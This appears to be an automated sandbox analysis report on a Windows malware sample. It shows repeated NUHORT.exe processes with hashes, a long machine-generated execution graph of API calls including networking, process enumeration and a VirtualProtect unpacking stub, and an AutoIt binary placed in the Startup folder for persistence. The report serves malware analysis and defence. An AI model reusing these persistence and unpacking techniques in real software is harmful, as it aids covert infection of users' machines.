                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:03:07:59
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:03:08:02
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:03:09:01
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true


                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:4.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:8.4%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:172
103583 20f8da 103583->103560 103584->103583 103587 20887d __dosmaperr 47 API calls 103584->103587 103588 20b957 __close_nolock 47 API calls 103585->103588 103586->103578 103589 20f8a6 GetLastError 103586->103589 103587->103583 103588->103590 103589->103578 103590->103578 103590->103582 103591->103546 103592->103550 103593->103560 103594->103550 103595->103547 103596->103553 103597->103550 103598->103073 103599->103079 103600->103076 103601->103099 103602->103101 103603->103097 103604->103105 103605->103111 103606->103124 103607->103120 103609 1ed828 _memmove 103608->103609 103610 1ed815 103608->103610 103609->103136 103610->103609 103611 20010a 48 API calls 103610->103611 103611->103609 103613 254aa5 GetFullPathNameW 103612->103613 103614 1e31c7 103612->103614 103616 254abd 103613->103616 103669 1e3bcf 103614->103669 103617 1e31cd GetFullPathNameW 103618 1e31e7 103617->103618 103618->102934 103620 1e3a8b SHGetDesktopFolder 103619->103620 103623 1e3ade 103619->103623 103621 1e3a99 103620->103621 103620->103623 103622 1e3ac8 SHGetPathFromIDListW 103621->103622 103621->103623 103622->103623 103623->102937 103625 1e3ba9 103624->103625 103631 1e3b72 103624->103631 103626 201bc7 _W_store_winword 59 API calls 103625->103626 103629 2533e5 103625->103629 103625->103631 103626->103625 103627 1e3bcf 48 API calls 103628 1e3b7d 103627->103628 103673 1e197e 103628->103673 103631->103627 103633 1e197e 48 API calls 103634 1e3b9f 103633->103634 103635 1e3dcb 103634->103635 103636 1e3f9b 135 API calls 103635->103636 103637 1e3def 103636->103637 103638 2539f9 103637->103638 103640 1e3f9b 135 API calls 103637->103640 103639 22cc82 121 API calls 103638->103639 103641 253a0e 103639->103641 103642 1e3e02 103640->103642 103643 253a12 103641->103643 103644 253a2f 103641->103644 103642->103638 103645 1e3e0a 103642->103645 103646 1e3e39 83 API calls 103643->103646 103647 20010a 48 API calls 103644->103647 103648 1e3e16 103645->103648 103649 253a1a 103645->103649 103646->103649 103668 253a74 
Mailbox 103647->103668 103703 1ebdf0 162 API calls 8 library calls 103648->103703 103704 22757b 86 API calls _wprintf 103649->103704 103652 253a28 103652->103644 103653 1e3e2e 103653->102939 103665 1ecaee 48 API calls 103665->103668 103668->103665 103670 1e3bd9 __wsetenvp 103669->103670 103671 20010a 48 API calls 103670->103671 103672 1e3bee _wcscpy 103671->103672 103672->103617 103674 1e1990 103673->103674 103678 1e19af _memmove 103673->103678 103677 20010a 48 API calls 103674->103677 103675 20010a 48 API calls 103676 1e19c6 103675->103676 103676->103633 103677->103678 103678->103675 103703->103653 103704->103652 103708 1ea72c 103707->103708 103713 1ea848 103707->103713 103709 20010a 48 API calls 103708->103709 103708->103713 103710 1ea753 103709->103710 103711 20010a 48 API calls 103710->103711 103717 1ea7c5 103711->103717 103713->102944 103715 1ea870 48 API calls 103715->103717 103716 1eb6d0 48 API calls 103716->103717 103717->103713 103717->103715 103717->103716 103720 1eace0 90 API calls 2 library calls 103717->103720 103721 22a3ee 48 API calls 103717->103721 103718->102946 103719->102948 103720->103717 103721->103717 103723 1e31a2 LoadImageW 103722->103723 103724 254ad8 EnumResourceNamesW 103722->103724 103725 1e3118 RegisterClassExW 103723->103725 103724->103725 103726 1e2f58 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 103725->103726 103727 1e2fe9 LoadIconW 103726->103727 103729 1e301e 103727->103729 103729->102964 103731 1ee80f 103730->103731 103732 1ee7fd 103730->103732 103998 22d520 85 API calls 4 library calls 103731->103998 103967 1edcd0 103732->103967 103734 1ee806 103734->103025 103736 2598e8 103736->103736 103738 1eea20 103737->103738 103739 1efa40 405 API calls 103738->103739 103743 1eea89 103738->103743 103741 259919 103739->103741 103740 2599bc 104009 22d520 85 API calls 4 library calls 103740->104009 103741->103743 104006 22d520 85 API calls 4 library calls 103741->104006 103747 1ed3d2 48 API calls 103743->103747 103768 1eeb18 
103743->103768 103774 1eecd7 Mailbox 103743->103774 103744 1ed3d2 48 API calls 103746 259997 103744->103746 104008 201b2a 52 API calls __cinit 103746->104008 103749 259963 103747->103749 104007 201b2a 52 API calls __cinit 103749->104007 103750 1ed380 55 API calls 103750->103774 103752 259d70 104018 23e2fb 405 API calls Mailbox 103752->104018 103754 259e49 104023 22d520 85 API calls 4 library calls 103754->104023 103755 1efa40 405 API calls 103755->103774 103756 22d520 85 API calls 103756->103774 103757 259dc2 104020 22d520 85 API calls 4 library calls 103757->104020 103758 259ddf 104021 23c235 405 API calls Mailbox 103758->104021 103762 1e342c 48 API calls 103762->103774 103766 259df7 103786 1eef0c Mailbox 103766->103786 104022 22d520 85 API calls 4 library calls 103766->104022 103767 1f14a0 48 API calls 103767->103774 103768->103744 103768->103774 103770 1ef56f 103770->103786 104019 22d520 85 API calls 4 library calls 103770->104019 103772 1ed805 48 API calls 103772->103774 103773 259a3c 104012 23d154 48 API calls 103773->104012 103774->103740 103774->103750 103774->103752 103774->103754 103774->103755 103774->103756 103774->103757 103774->103758 103774->103762 103774->103767 103774->103770 103774->103772 103774->103773 103774->103786 104010 22a3ee 48 API calls 103774->104010 104011 23ede9 405 API calls 103774->104011 104016 21a599 InterlockedDecrement 103774->104016 104017 23f4df 405 API calls 103774->104017 103776 259a48 103778 259a56 103776->103778 103779 259a9b 103776->103779 104013 22a485 48 API calls 103778->104013 103782 259a91 Mailbox 103779->103782 104014 22afce 48 API calls 103779->104014 103780 1efa40 405 API calls 103780->103786 103782->103780 103784 259ad8 103786->103025 103788 1f469f 103787->103788 103789 1f4537 103787->103789 103792 1ecaee 48 API calls 103788->103792 103790 257820 103789->103790 103791 1f4543 103789->103791 104190 23e713 405 API calls Mailbox 103790->104190 104024 1f4040 103791->104024 103795 1f45e4 Mailbox 103792->103795 104039 
22efcd 103795->104039 104073 241f19 103795->104073 104076 236fc3 103795->104076 104079 22dce9 103795->104079 104084 1e50ec 103795->104084 104088 231080 103795->104088 104091 24352a 103795->104091 104170 2395af WSAStartup 103795->104170 104172 239500 103795->104172 104181 1ff55e 103795->104181 103796 1f4559 103796->103795 103797 1f4639 Mailbox 103796->103797 103798 25782c 103796->103798 103797->103025 103798->103797 104191 22d520 85 API calls 4 library calls 103798->104191 104600 1ea9a0 103810->104600 103812 1f36e7 103813 1f3778 103812->103813 103814 25a269 103812->103814 103875 1f3aa8 103812->103875 104622 1fbc04 85 API calls 103813->104622 104627 22d520 85 API calls 4 library calls 103814->104627 103818 25a68d 103818->103875 104642 22d520 85 API calls 4 library calls 103818->104642 103820 1f3793 103820->103818 103849 1f396b Mailbox _memmove 103820->103849 103820->103875 104605 1e10e8 103820->104605 103824 25a289 103828 1ed2d2 53 API calls 103824->103828 103868 25a3e9 103824->103868 103825 25a583 103827 1efa40 405 API calls 103825->103827 103826 25a45c 104636 22d520 85 API calls 4 library calls 103826->104636 103837 1f399f 103870 1ec935 48 API calls 103837->103870 103871 1f39c0 103837->103871 103844 25a5e6 104640 22d520 85 API calls 4 library calls 103844->104640 103845 1efa40 405 API calls 103845->103849 103849->103824 103849->103825 103849->103826 103849->103837 103849->103844 103849->103845 103851 1fbc5c 48 API calls 103849->103851 103861 1ed89e 50 API calls 103849->103861 103869 20010a 48 API calls 103849->103869 103849->103875 104623 1ed500 53 API calls __cinit 103849->104623 104624 1ed420 53 API calls 103849->104624 104625 1fbaef 48 API calls _memmove 103849->104625 104637 23d21a 81 API calls Mailbox 103849->104637 104638 2289e0 53 API calls 103849->104638 104639 1ed772 55 API calls 103849->104639 103851->103849 103861->103849 103869->103849 103870->103871 103871->103875 103879 1f3ab5 Mailbox 103875->103879 104626 22d520 85 API calls 4 library calls 
103875->104626 103879->103025 103881 25ee11 103880->103881 103882 1ff390 103880->103882 103883 25ee46 103881->103883 103884 25ee28 TranslateAcceleratorW 103881->103884 103882->103025 103884->103882 103886 1fed2c 103885->103886 103888 1fed34 103885->103888 103886->103025 103887 1fed5e IsDialogMessageW 103887->103886 103887->103888 103888->103886 103888->103887 103889 25ebec GetClassLongW 103888->103889 103889->103887 103889->103888 103890->103025 103891->102977 103892->102971 103893->102976 103894->103025 103895->103025 103896->103020 103897->103020 103898->103020 103900 1efa60 103899->103900 103936 1efa8e Mailbox _memmove 103899->103936 103901 20010a 48 API calls 103900->103901 103901->103936 103902 1f105e 103903 1ec935 48 API calls 103902->103903 103928 1efbf1 Mailbox 103903->103928 103904 1f0119 105098 22d520 85 API calls 4 library calls 103904->105098 103907 1f0dee 103914 1ed89e 50 API calls 103907->103914 103909 1f1063 105097 22d520 85 API calls 4 library calls 103909->105097 103910 201b2a 52 API calls __cinit 103910->103936 103911 1ec935 48 API calls 103911->103936 103912 1f0dfa 103917 1ed89e 50 API calls 103912->103917 103913 25b772 105099 22d520 85 API calls 4 library calls 103913->105099 103914->103912 103915 20010a 48 API calls 103915->103936 103919 1f0e83 103917->103919 103923 1ecaee 48 API calls 103919->103923 103920 1ed3d2 48 API calls 103920->103936 103922 25b7d2 103931 1f10f1 Mailbox 103923->103931 103926 1f1230 103926->103928 105096 22d520 85 API calls 4 library calls 103926->105096 103928->103025 103929 1efa40 405 API calls 103929->103936 105095 22d520 85 API calls 4 library calls 103931->105095 103933 21a599 InterlockedDecrement 103933->103936 103934 25b583 105094 22d520 85 API calls 4 library calls 103934->105094 103936->103902 103936->103904 103936->103907 103936->103909 103936->103910 103936->103911 103936->103912 103936->103913 103936->103915 103936->103919 103936->103920 103936->103926 103936->103928 103936->103929 103936->103931 
103936->103933 103936->103934 103952 241f19 129 API calls 103936->103952 104645 1ef6d0 103936->104645 104717 2410e5 103936->104717 104723 238065 GetCursorPos GetForegroundWindow 103936->104723 104737 1e50a3 103936->104737 104742 24804e 103936->104742 104756 24798d 103936->104756 104761 240bfa 103936->104761 104764 1ff461 103936->104764 104802 23013f 103936->104802 104815 2392c0 103936->104815 104833 2417aa 103936->104833 104838 23936f 103936->104838 104866 239122 103936->104866 104880 2430ad 103936->104880 104929 1e81c6 103936->104929 104999 1fef0d 103936->104999 105042 1ff03e 103936->105042 105045 23b74b VariantInit 103936->105045 105086 1fdd84 103936->105086 105089 1f1620 59 API calls Mailbox 103936->105089 105090 23ee52 81 API calls 2 library calls 103936->105090 105091 23ef9d 89 API calls Mailbox 103936->105091 105092 22b020 48 API calls 103936->105092 105093 23e713 405 API calls Mailbox 103936->105093 103952->103936 103956->103025 103957->103020 103958->103020 103959->103020 105614 2279c2 103960->105614 103962 227021 CloseHandle 103962->103020 103963 226fa4 Process32NextW 103963->103962 103965 226fa0 _wcscat 103963->103965 103964 20297d __wsplitpath 47 API calls 103964->103965 103965->103962 103965->103963 103965->103964 103966 201bc7 _W_store_winword 59 API calls 103965->103966 103966->103965 103968 1efa40 405 API calls 103967->103968 103980 1edd0f _memmove 103968->103980 103969 258dbe 104005 22d520 85 API calls 4 library calls 103969->104005 103971 258ddc 103971->103971 103972 1edd70 103972->103734 103973 1ee12b Mailbox 103975 20010a 48 API calls 103973->103975 103974 1ee051 103976 1ee066 103974->103976 103977 258daf 103974->103977 103989 1edecb _memmove 103975->103989 103979 20010a 48 API calls 103976->103979 104004 23d1da 50 API calls 103977->104004 103991 1edf64 103979->103991 103980->103969 103980->103972 103980->103973 103981 20010a 48 API calls 103980->103981 103982 1edeb7 103980->103982 103993 1edf29 103980->103993 103981->103980 103982->103973 103985 
1edec4 103982->103985 103983 20010a 48 API calls 103984 1edef6 103983->103984 103984->103993 103999 1f4320 405 API calls 103984->103999 103987 20010a 48 API calls 103985->103987 103986 258d9e 104003 22d520 85 API calls 4 library calls 103986->104003 103987->103989 103989->103983 103989->103984 103989->103993 103991->103734 103993->103974 103993->103986 103993->103991 103994 258d76 103993->103994 103996 258d51 103993->103996 104000 1e5322 405 API calls 103993->104000 104002 22d520 85 API calls 4 library calls 103994->104002 104001 22d520 85 API calls 4 library calls 103996->104001 103998->103736 103999->103993 104000->103993 104001->103991 104002->103991 104003->103991 104004->103969 104005->103971 104006->103743 104007->103768 104008->103774 104009->103786 104010->103774 104011->103774 104012->103776 104013->103782 104014->103784 104016->103774 104017->103774 104018->103770 104019->103786 104020->103786 104021->103766 104022->103786 104023->103786 104025 25787b 104024->104025 104028 1f406c 104024->104028 104193 22d520 85 API calls 4 library calls 104025->104193 104027 25788c 104194 22d520 85 API calls 4 library calls 104027->104194 104028->104027 104035 1f40a6 _memmove 104028->104035 104031 20010a 48 API calls 104031->104035 104032 1f41f1 104032->103796 104033 1efa40 405 API calls 104033->104035 104034 1f4185 104034->103796 104035->104031 104035->104033 104035->104034 104036 1f4175 104035->104036 104037 2578d8 104035->104037 104036->104034 104192 23d21a 81 API calls Mailbox 104036->104192 104195 22d520 85 API calls 4 library calls 104037->104195 104196 1e84a6 104039->104196 104041 22eff2 104216 2278ad GetFullPathNameW 104041->104216 104244 2423c5 104073->104244 104077 1e84a6 80 API calls 104076->104077 104078 236fd6 SetWindowTextW 104077->104078 104078->103797 104080 1e84a6 80 API calls 104079->104080 104081 22dcfc 104080->104081 104346 226d6d 104081->104346 104085 1e50f6 104084->104085 104086 1e5105 104084->104086 104085->103797 104086->104085 104087 1e510a 
CloseHandle 104086->104087 104087->104085 104358 2322e5 104088->104358 104092 1ed3d2 48 API calls 104091->104092 104093 24354a 104092->104093 104094 1ed3d2 48 API calls 104093->104094 104095 243553 104094->104095 104096 1ed3d2 48 API calls 104095->104096 104171 2395e0 104170->104171 104171->103797 104173 1ecdb4 48 API calls 104172->104173 104174 239515 104173->104174 104175 22be47 50 API calls 104174->104175 104176 239522 104175->104176 104177 23952f send 104176->104177 104182 1ecdb4 48 API calls 104181->104182 104183 1ff572 104182->104183 104184 2575d1 Sleep 104183->104184 104185 1ff57a timeGetTime 104183->104185 104186 1ecdb4 48 API calls 104185->104186 104190->103798 104191->103797 104192->104032 104193->104027 104194->104034 104195->104034 104197 1e84be 104196->104197 104214 1e84ba 104196->104214 104198 255494 104197->104198 104199 1e84d2 104197->104199 104200 255592 __i64tow 104197->104200 104208 1e84ea __itow Mailbox _wcscpy 104197->104208 104201 25549d 104198->104201 104202 25557a 104198->104202 104235 20234b 79 API calls 4 library calls 104199->104235 104207 2554bc 104201->104207 104201->104208 104236 20234b 79 API calls 4 library calls 104202->104236 104205 20010a 48 API calls 104206 1e84f4 104205->104206 104206->104214 104208->104205 104214->104041 104217 1e7e53 48 API calls 104216->104217 104235->104208 104236->104208 104245 2423eb _memset 104244->104245 104246 242452 104245->104246 104247 242428 104245->104247 104251 1ecdb4 48 API calls 104246->104251 104252 242476 104246->104252 104248 1ecdb4 48 API calls 104247->104248 104249 242433 104248->104249 104249->104252 104250 2424b0 104253 242448 104251->104253 104252->104250 104255 1ecdb4 48 API calls 104252->104255 104255->104250 104347 226d8a __wsetenvp 104346->104347 104348 226db3 GetFileAttributesW 104347->104348 104359 232306 104358->104359 104360 232365 104359->104360 104361 23230a 104359->104361 104427 1ff0f3 48 API calls 104360->104427 104362 20010a 48 API calls 104361->104362 104364 232311 
104362->104364 104371 232379 104427->104371 104601 1ea9af 104600->104601 104604 1ea9ca 104600->104604 104602 1eb8a7 48 API calls 104601->104602 104603 1ea9b7 CharUpperBuffW 104602->104603 104603->104604 104604->103812 104606 1e10f9 104605->104606 104607 254c5a 104605->104607 104608 20010a 48 API calls 104606->104608 104622->103820 104623->103849 104624->103849 104625->103849 104626->103879 104627->103820 104636->103875 104637->103849 104638->103849 104639->103849 104640->103875 104642->103875 104646 1ef77b 104645->104646 104647 1ef708 104645->104647 104654 25c253 104646->104654 104699 1ef787 104646->104699 104648 1ef712 104647->104648 104650 25c4d5 104647->104650 104653 1ef71c 104648->104653 104669 25c544 104648->104669 104649 1efa40 405 API calls 104649->104699 104651 25c4f4 104650->104651 104652 25c4e2 104650->104652 105128 23c235 405 API calls Mailbox 104651->105128 105100 23f34f 104652->105100 104658 25c6a4 104653->104658 104668 1ef72a 104653->104668 104670 1ef741 104653->104670 105123 22d520 85 API calls 4 library calls 104654->105123 104662 1ec935 48 API calls 104658->104662 104659 25c585 104665 25c5a4 104659->104665 104666 25c590 104659->104666 104660 25c264 104660->103936 104661 25c507 104664 25c50b 104661->104664 104661->104670 104662->104670 105129 22d520 85 API calls 4 library calls 104664->105129 105131 23d154 48 API calls 104665->105131 104671 23f34f 405 API calls 104666->104671 104668->104670 105136 21a599 InterlockedDecrement 104668->105136 104669->104659 104678 25c569 104669->104678 104675 25c7b5 104670->104675 104714 1ef770 Mailbox 104670->104714 105137 23ee52 81 API calls 2 library calls 104670->105137 104671->104670 104673 25c45a 104677 1ec935 48 API calls 104673->104677 104682 25c7eb 104675->104682 105138 23ef9d 89 API calls Mailbox 104675->105138 104676 25c5af 104677->104670 105130 22d520 85 API calls 4 library calls 104678->105130 104679 1ef84a 104685 25c32a 104679->104685 104696 1ef854 104679->104696 104683 1ed89e 50 API calls 104682->104683 
104683->104714 105124 1e342c 48 API calls 104685->105124 104686 25c793 104688 1e84a6 80 API calls 104686->104688 104690 25c7c9 104692 1ef8bb 104692->104660 104692->104670 104692->104673 105125 21a599 InterlockedDecrement 104692->105125 105127 23f4df 405 API calls 104692->105127 104693 1f14a0 48 API calls 104698 1ef8ab 104693->104698 104694 202241 48 API calls 104694->104699 104696->104693 104698->104692 104701 1ef9d8 104698->104701 104699->104649 104699->104679 104699->104692 104699->104694 104699->104701 104699->104714 105126 22d520 85 API calls 4 library calls 104701->105126 104714->103936 104718 1e84a6 80 API calls 104717->104718 104719 2410fb LoadLibraryW 104718->104719 104720 24111e 104719->104720 104722 24110f 104719->104722 104720->104722 105207 2428d9 48 API calls _memmove 104720->105207 104722->103936 105208 236b19 104723->105208 104726 2380a5 104727 1e3320 48 API calls 104726->104727 104728 2380b3 104727->104728 105213 1f2320 50 API calls 104728->105213 104730 238102 104731 1ecdb4 48 API calls 104730->104731 104736 2380f5 104730->104736 104733 23812b 104731->104733 104735 1ecdb4 48 API calls 104733->104735 104733->104736 104735->104736 104736->103936 104738 20010a 48 API calls 104737->104738 104739 1e50b3 104738->104739 104740 1e50ec CloseHandle 104739->104740 104741 1e50be 104740->104741 104741->103936 105215 1e19ee 104742->105215 104757 1e19ee 82 API calls 104756->104757 104758 24799b 104757->104758 104759 1e1dce 106 API calls 104758->104759 104760 2479a4 104759->104760 104760->103936 105377 23f79f 104761->105377 104763 240c0a 104763->103936 104765 1ff47f 104764->104765 104766 1ff48a 104764->104766 104767 1ecdb4 48 API calls 104765->104767 104769 1e84a6 80 API calls 104766->104769 104790 1ff498 Mailbox 104766->104790 104767->104766 104768 20010a 48 API calls 104770 1ff49f 104768->104770 104771 256841 104769->104771 104772 1ff4af 104770->104772 105452 1e5080 49 API calls 104770->105452 105453 20297d 104771->105453 104776 1e84a6 80 API calls 
104772->104776 104778 1ff4bf 104776->104778 104790->104768 104800 1ff50a Mailbox 104790->104800 104800->103936 104803 230157 104802->104803 104804 23015e 104802->104804 104806 1e84a6 80 API calls 104803->104806 104805 1e84a6 80 API calls 104804->104805 104805->104803 104807 23017c 104806->104807 105485 2276db GetFileVersionInfoSizeW 104807->105485 104809 23018d 104810 230192 104809->104810 104812 2301a3 _wcscmp 104809->104812 104816 1ea6d4 48 API calls 104815->104816 104817 2392d2 104816->104817 104818 1e84a6 80 API calls 104817->104818 104819 2392e1 104818->104819 104820 1ff26b 50 API calls 104819->104820 104821 2392ed gethostbyname 104820->104821 104822 2392fa WSAGetLastError 104821->104822 104823 23931d _memmove 104821->104823 104834 1e84a6 80 API calls 104833->104834 104835 2417c7 104834->104835 104836 226f5b 63 API calls 104835->104836 104837 2417d8 104836->104837 104837->103936 104839 1ecdb4 48 API calls 104838->104839 104840 23938a 104839->104840 104841 1ecdb4 48 API calls 104840->104841 104842 23939a 104841->104842 104843 1eca8e 48 API calls 104842->104843 104844 2393a9 104843->104844 104845 2393c2 select 104844->104845 104861 2393ae Mailbox _memmove 104844->104861 104861->103936 104867 1e84a6 80 API calls 104866->104867 104868 23913f 104867->104868 104869 1ecdb4 48 API calls 104868->104869 104870 239149 104869->104870 105506 23acd3 104870->105506 104881 1eca8e 48 API calls 104880->104881 104882 2430ca 104881->104882 104883 1ed3d2 48 API calls 104882->104883 104884 2430d3 104883->104884 104885 1ed3d2 48 API calls 104884->104885 104886 2430dc 104885->104886 104887 1ed3d2 48 API calls 104886->104887 104930 1e84a6 80 API calls 104929->104930 104931 1e81e5 104930->104931 104932 1e84a6 80 API calls 104931->104932 104933 1e81fa 104932->104933 104934 1e84a6 80 API calls 104933->104934 104935 1e820d 104934->104935 104936 1e84a6 80 API calls 104935->104936 105000 1eca8e 48 API calls 104999->105000 105001 1fef25 105000->105001 105002 1fef3e 105001->105002 105003 
1feffb 105001->105003 105573 1ff0f3 48 API calls 105002->105573 105004 20010a 48 API calls 105003->105004 105006 1ff002 105004->105006 105007 1ff00e 105006->105007 105575 1e5080 49 API calls 105006->105575 105009 1e84a6 80 API calls 105007->105009 105010 1fef73 105015 1ff03e 2 API calls 105010->105015 105011 1fef4d 105011->105010 105012 256942 105011->105012 105013 1ecdb4 48 API calls 105011->105013 105012->103936 105016 256965 105013->105016 105016->105010 105043 1ff0b5 2 API calls 105042->105043 105044 1ff046 105043->105044 105044->103936 105046 1eca8e 48 API calls 105045->105046 105047 23b7a3 CoInitialize 105046->105047 105048 23b7ae CoUninitialize 105047->105048 105050 23b7b4 105047->105050 105048->105050 105049 23b7d5 105052 23b81b 105049->105052 105054 1e84a6 80 API calls 105049->105054 105050->105049 105051 1eca8e 48 API calls 105050->105051 105051->105049 105053 1e84a6 80 API calls 105052->105053 105055 23b827 105053->105055 105056 23b7ef 105054->105056 105602 21a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 105056->105602 105609 1fdd92 GetFileAttributesW 105086->105609 105089->103936 105090->103936 105091->103936 105092->103936 105093->103936 105094->103931 105095->103928 105096->103909 105097->103904 105098->103913 105099->103922 105101 1ed3d2 48 API calls 105100->105101 105102 23f389 Mailbox 105101->105102 105104 23f3e1 105102->105104 105105 23f3cd 105102->105105 105119 23f3a9 105102->105119 105123->104660 105124->104692 105125->104692 105126->104714 105127->104692 105128->104661 105129->104714 105130->104714 105131->104676 105136->104670 105137->104686 105138->104690 105207->104722 105209 236b42 105208->105209 105210 236b25 GetWindowRect 105208->105210 105211 236b5c 105209->105211 105212 236b52 ClientToScreen 105209->105212 105210->105211 105211->104726 105211->104730 105212->105211 105216 1ed89e 50 API calls 105215->105216 105217 1e1a08 105216->105217 105218 25db7d 105217->105218 105219 1e1a12 105217->105219 105221 1e7e53 
48 API calls 105218->105221 105220 1e84a6 80 API calls 105219->105220 105222 1e1a1f 105220->105222 105223 25db8d 105221->105223 105224 1ec935 48 API calls 105222->105224 105223->105223 105378 1e84a6 80 API calls 105377->105378 105379 23f7db 105378->105379 105390 23f81d Mailbox 105379->105390 105413 240458 105379->105413 105390->104763 105414 1eb8a7 48 API calls 105413->105414 105415 240473 CharLowerBuffW 105414->105415 105416 23267a 60 API calls 105415->105416 105452->104772 105459 2029c7 105453->105459 105460 2029e2 105459->105460 105463 2029d6 105459->105463 105463->105460 105486 227700 105485->105486 105496 2276f9 _wcsncpy 105485->105496 105487 20010a 48 API calls 105486->105487 105488 227706 GetFileVersionInfoW 105487->105488 105496->104809 105514 23ae3b 105506->105514 105515 1ea6d4 48 API calls 105514->105515 105573->105011 105575->105007 105610 254a7d FindFirstFileW 105609->105610 105611 1fdd89 105609->105611 105612 254a95 FindClose 105610->105612 105613 254a8e 105610->105613 105611->103936 105613->105612 105615 2279e9 105614->105615 105619 2279d0 105614->105619 105621 20224a 58 API calls __wcstoi64 105615->105621 105617 2279ef 105617->103965 105619->105615 105619->105617 105620 2022df GetStringTypeW wcstoxq 105619->105620 105620->105619 105621->105617 105622 25a0a7 105626 22af66 105622->105626 105624 25a0b2 105625 22af66 83 API calls 105624->105625 105625->105624 105627 22af73 105626->105627 105636 22afa0 105626->105636 105628 22afa2 105627->105628 105629 22afa7 105627->105629 105634 22af9a 105627->105634 105627->105636 105647 1ff833 80 API calls 105628->105647 105631 1e84a6 80 API calls 105629->105631 105632 22afae 105631->105632 105637 1e7b4b 105632->105637 105646 1f4265 61 API calls _memmove 105634->105646 105636->105624 105638 1e7b5d 105637->105638 105639 25240d 105637->105639 105648 1ebbd9 105638->105648 105654 21c0a2 48 API calls _memmove 105639->105654 105642 1e7b69 105642->105636 105643 252417 105644 1ec935 48 API calls 105643->105644 105645 25241f 
Mailbox 105644->105645 105646->105636 105647->105629 105649 1ebbe7 105648->105649 105651 1ebc0d _memmove 105648->105651 105650 20010a 48 API calls 105649->105650 105649->105651 105652 1ebc5c 105650->105652 105651->105642 105653 20010a 48 API calls 105652->105653 105653->105651 105654->105643 105655 25c146 GetUserNameW 105656 3430b0 105657 3430c0 105656->105657 105658 3431da LoadLibraryA 105657->105658 105663 34321f VirtualProtect VirtualProtect 105657->105663 105659 3431f1 105658->105659 105659->105657 105662 343203 6C1F6DE0 105659->105662 105661 343284 105661->105661 105662->105659 105664 343219 ExitProcess 105662->105664 105663->105661 105665 1f1118 105731 1fe016 105665->105731 105667 1f112e 105668 1f1148 105667->105668 105669 25abeb 105667->105669 105671 1f3680 405 API calls 105668->105671 105745 1fcf79 49 API calls 105669->105745 105705 1efad8 Mailbox _memmove 105671->105705 105673 25b628 Mailbox 105674 25ac2a 105676 25ac4a Mailbox 105674->105676 105746 22ba5d 48 API calls 105674->105746 105749 22d520 85 API calls 4 library calls 105676->105749 105678 1f0119 105752 22d520 85 API calls 4 library calls 105678->105752 105679 1f105e 105686 1ec935 48 API calls 105679->105686 105681 1f0dee 105687 1ed89e 50 API calls 105681->105687 105683 1f0dfa 105690 1ed89e 50 API calls 105683->105690 105684 25b772 105753 22d520 85 API calls 4 library calls 105684->105753 105685 1f1063 105751 22d520 85 API calls 4 library calls 105685->105751 105702 1efbf1 Mailbox 105686->105702 105687->105683 105688 1ec935 48 API calls 105688->105705 105692 1f0e83 105690->105692 105691 1ef6d0 405 API calls 105691->105705 105697 1ecaee 48 API calls 105692->105697 105693 1ed3d2 48 API calls 105693->105705 105695 25b7d2 105696 201b2a 52 API calls __cinit 105696->105705 105709 1f10f1 Mailbox 105697->105709 105700 1f1230 105700->105702 105750 22d520 85 API calls 4 library calls 105700->105750 105703 20010a 48 API calls 105703->105705 105704 1efa40 405 API calls 105704->105705 105705->105678 
Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 001E376D
  • Part of subcall function 001E4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 001E428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 001E377F
• GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,002A1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,002A1124,?,?), ref: 001E37EE
  • Part of subcall function 001E34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 001E352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 001E3860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00292934,00000010), ref: 002521C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 002521FD
